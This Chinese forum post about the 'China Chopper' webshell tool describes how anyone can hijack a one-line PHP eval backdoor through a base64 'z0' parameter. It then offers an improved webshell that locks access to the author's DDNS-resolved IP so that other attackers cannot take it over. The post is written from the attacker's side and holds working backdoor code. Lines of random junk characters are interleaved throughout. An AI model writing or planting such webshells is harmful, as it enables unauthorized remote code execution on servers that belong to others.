今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
9 \, J, B _0 |2 e) R3 a" A; x; f5 L" B& m! S
就算你设置了密码,使用了eval($_REQUEST['moyo']);
( {) a2 o& Q% S, P$ G' d5 ?4 `- ]0 w* E- `4 ^
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门
$ B# u3 X' s0 D& ~; `, g6 r+ q9 R* P1 r4 r3 a
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));5 v% g! z4 P( {! |, \7 a
2 s5 B, z! p8 W. Z. Q* m U D直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了5 L, D1 U, w6 W) z5 u& e% Q
) t6 ~" V) G' S2 V3 H$ V: M @
不知道是设计缺陷还是故意留的后门
8 S0 E% x2 z9 n4 b
3 D# }& M& \4 ?1 ~- @0 x% o如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
X/ V0 A' H) ?. ?3 E: W6 N; ^- {' ?7 i j! n+ C: X" A
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org+ Z% |+ Y% J# {; z- `% w0 y9 ?
8 o2 X V5 t2 C2 w. @2 P然后一句话后门这样写
& e' b9 \, {% Z8 V7 w- w. K0 B9 ]! L4 x
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>
2 @* B6 P) n: N' }- E# D这样就可以让一句话后门只允许自己的电脑连接了
" A2 r/ ?9 _5 E$ \, h$ O/ I8 T" E
c# z* X. [; N6 D& ~( D3 a* m |